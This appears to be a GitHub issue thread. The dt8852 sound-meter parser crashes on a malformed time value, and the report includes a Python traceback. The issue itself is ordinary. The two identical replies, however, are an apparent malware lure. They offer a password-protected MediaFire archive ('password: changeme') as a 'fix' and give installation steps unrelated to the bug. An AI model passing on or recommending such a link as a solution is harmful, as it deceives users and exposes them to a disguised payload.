### ISSUE TITLE
Invalid date crashes parser/script

### ISSUE THREAD

**Issue by NerdyProjects** [NerdyProjects/dt8852#1]
In my application I use this device for long-term volume monitoring. Unfortunately, the device has proven to be quite unreliable. I regularly get crashes described by the clock problem.

```
Aug 29 04:04:36 raspberrypi python3[1420]: Traceback (most recent call last):
Aug 29 04:04:36 raspberrypi python3[1420]:   File "/home/pi/log_dt/main.py", line 35, in <module>
Aug 29 04:04:36 raspberrypi python3[1420]:     set_mode()
Aug 29 04:04:36 raspberrypi python3[1420]:   File "/home/pi/log_dt/main.py", line 31, in set_mode
Aug 29 04:04:36 raspberrypi python3[1420]:     for _ in spl_meter.decode_next_token():
Aug 29 04:04:36 raspberrypi python3[1420]:   File "/home/pi/log_dt/venv/lib/python3.11/site-packages/dt8852/dt8852.py", line 168, in decode_next_token
Aug 29 04:04:36 raspberrypi python3[1420]:     decoded_token = getattr(self, f"_Dt8852__decode_token_0x{token}")()
Aug 29 04:04:36 raspberrypi python3[1420]:                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Aug 29 04:04:36 raspberrypi python3[1420]:   File "/home/pi/log_dt/venv/lib/python3.11/site-packages/dt8852/dt8852.py", line 233, in __decode_token_0x06
Aug 29 04:04:36 raspberrypi python3[1420]:     current_time = time.strptime(time_string, "%I:%M:%S %p")
Aug 29 04:04:36 raspberrypi python3[1420]:                    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Aug 29 04:04:36 raspberrypi python3[1420]:   File "/usr/lib/python3.11/_strptime.py", line 562, in _strptime_time
Aug 29 04:04:36 raspberrypi python3[1420]:     tt = _strptime(data_string, format)[0]
Aug 29 04:04:36 raspberrypi python3[1420]:          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Aug 29 04:04:36 raspberrypi python3[1420]:   File "/usr/lib/python3.11/_strptime.py", line 349, in _strptime
Aug 29 04:04:36 raspberrypi python3[1420]:     raise ValueError("time data %r does not match format %r" %
Aug 29 04:04:36 raspberrypi python3[1420]: ValueError: time data '00:00:20 am' does not match format '%I:%M:%S %p'
```

This should be fixed in a way that just ignores the datetime or sets an invalid flag. In my application, I use systemtime anyway...

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
